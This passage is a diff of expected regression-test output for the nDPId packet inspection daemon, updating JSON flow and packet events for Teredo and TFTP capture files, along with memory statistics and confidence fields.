00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1438853619844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853619844,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcAAAHIRHQfCiBxMCnAQWQ3Y690AdQSAAAEAAJXRHBBSCtwOAAAAFCJG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZJ0AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEz\/AAAAACABAA=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1438853629357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853629357,"pkt":"bEFqjICJABsXAAEVCABFAABZf5wAAH4Rw1cKcBBcwogcTPfYDdgAReM8AAEAAPs1qOhE924kAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1438853629411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853629411,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcEAAHIRHQPCiBxMCnAQXA3Y99gAdXxOAAEAAPs1qOhE924kAAAACCdG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZL4AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEwAAAAAAAAAAA=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1438853632713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853632713,"pkt":"bEFqjICJABsXAAEVCABFAABZcmgAAH4R0KcKcBBAwogcTNtaDdgARUt\/AAEAABh7537NjT4KAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1438853632766,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853632766,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcIAAHIRHR7CiBxMCnAQQA3Y21oAdWZ0AAEAABh7537NjT4KAAAAJKVG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYARiEAAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEy6FgeABnFWlQ=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1438853633749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1438853633749,"pkt":"bEFqjICJABsXAAEVCABFAABQa1QAAH4R18EKcBBDwogcTMpkDdgAPJPWYAAAAAAMOhUgAQAAwogcTCDzNZtG+T9GIALCiBxMAAAAAAAAwogcTYAA6wgo8LJvAAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1438853633749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1438853633749,"pkt":"bEFqjICJABsXAAEVCABFAABRa1UAAH4R178KcBBDwogcTMpkDdgAPZLqYAAAAAANOv8gAQAAwogcTCDzNZtG+T9GIALCiBxMAAAAAAAAwogcTIAAbVcAAQaF2tytrco="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1438853633803,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1438853633803,"pkt":"ABsXAAEVbEFqjICJCABFAABRMcMAAHIRHVLCiBxMCnAQQw3YymQAPZNqYAAAAAANOn8gAsKIHEwAAAAAAADCiBxMIAEAAMKIHEwg8zWbRvk\/RoEAbFcAAQaF2tytrco="} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1438853653349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853653349,"pkt":"bEFqjICJABsXAAEVCABFAABZW7oAAH4R5ysKcBBqwogcTM0hDdgARX2HAAEAALEbP+pGqa\/pAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1438853633749,"flow_last_seen":1438853651224,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853632713,"flow_last_seen":1438853632766,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853619792,"flow_last_seen":1438853619844,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1438853615305,"flow_last_seen":1438853653403,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853629357,"flow_last_seen":1438853629411,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1438853633749,"flow_last_seen":1438853651224,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853632713,"flow_last_seen":1438853632766,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853619792,"flow_last_seen":1438853619844,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1438853615305,"flow_last_seen":1438853653403,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853629357,"flow_last_seen":1438853629411,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":30,"global_ts_msec":1438853653403} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -36,9 +36,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874379 bytes -~~ total memory freed........: 5874379 bytes -~~ total allocations/frees...: 118154/118154 +~~ total memory allocated....: 6008013 bytes +~~ total memory freed........: 6008013 bytes +~~ total allocations/frees...: 120916/120916 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 687 chars diff --git a/test/results/tftp.pcap.out b/test/results/tftp.pcap.out index c193041cb..d1d136708 100644 --- a/test/results/tftp.pcap.out +++ b/test/results/tftp.pcap.out @@ -1,39 +1,52 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tftp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1367411051972} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1367411051972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1367411051972,"pkt":"AFCN14tDAAu+GJpACABFAAAwAAAAAP8ROWXAqAD9wKgACsW6AEUAHD4gAAFyZmMxMzUwLnR4dABvY3RldAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411052077,"flow_last_seen":1367411052077,"flow_idle_time":200000,"flow_min_l4_payload_len":516,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1367411052077,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -01120{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1367411052077,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1367411052077,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkyUAAIARI1DAqAAKwKgA\/Q11xboCDNSjAAMAAQoKCgoKCk5ldHdvcmsgV29ya2luZyBHcm91cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSy4gU29sbGlucwpSZXF1ZXN0IEZvciBDb21tZW50czogMTM1MCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNSVQKU1REOiAzMyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSnVseSAxOTkyCk9ic29sZXRlczogUkZDIDc4MwoKCiAgICAgICAgICAgICAgICAgICAgIFRIRSBURlRQIFBST1RPQ09MIChSRVZJU0lPTiAyKQoKU3RhdHVzIG9mIHRoaXMgTWVtbwoKICAgVGhpcyBSRkMgc3BlY2lmaWVzIGFuIElBQiBzdGFuZGFyZHMgdHJhY2sgcHJvdG9jb2wgZm9yIHRoZSBJbnRlcm5ldAogICBjb21tdW5pdHksIGFuZCByZXF1ZXN0cyBkaXNjdXNzaW9uIGFuZCBzdWdnZXN0aW9ucyBmb3IgaW1wcm92ZW1lbnRzLgogICBQbGVhc2UgcmVmZXIgdG8gdGhlIGN1cnJlbnQgZWRpdGlvbiBvZiB0aGUgIklB"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1367411052081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":1367411052081,"pkt":"AFCN14tDAAu+GJpACABFAAAgAAEAAP8ROXTAqAD9wKgACsW6DXUADKpJAAQAAQAAAAAAAAAAAAAAAAAA"} -01120{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1367411052086,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1367411052086,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkycAAIARI07AqAAKwKgA\/Q11xboCDOXlAAMAAkIgT2ZmaWNpYWwgUHJvdG9jb2wKICAgU3RhbmRhcmRzIiBmb3IgdGhlIHN0YW5kYXJkaXphdGlvbiBzdGF0ZSBhbmQgc3RhdHVzIG9mIHRoaXMgcHJvdG9jb2wuCiAgIERpc3RyaWJ1dGlvbiBvZiB0aGlzIG1lbW8gaXMgdW5saW1pdGVkLgoKU3VtbWFyeQoKICAgVEZUUCBpcyBhIHZlcnkgc2ltcGxlIHByb3RvY29sIHVzZWQgdG8gdHJhbnNmZXIgZmlsZXMuICBJdCBpcyBmcm9tCiAgIHRoaXMgdGhhdCBpdHMgbmFtZSBjb21lcywgVHJpdmlhbCBGaWxlIFRyYW5zZmVyIFByb3RvY29sIG9yIFRGVFAuCiAgIEVhY2ggbm9udGVybWluYWwgcGFja2V0IGlzIGFja25vd2xlZGdlZCBzZXBhcmF0ZWx5LiAgVGhpcyBkb2N1bWVudAogICBkZXNjcmliZXMgdGhlIHByb3RvY29sIGFuZCBpdHMgdHlwZXMgb2YgcGFja2V0cy4gIFRoZSBkb2N1bWVudCBhbHNvCiAgIGV4cGxhaW5zIHRoZSByZWFzb25zIGJlaGluZCBzb21lIG9mIHRoZSBkZXNpZ24gZGVjaXNpb25zLgoKQWNrbm93bGVnZW1lbnRzCgogICBUaGUg"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1367411052077,"flow_last_seen":1367411052088,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1367411052088,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 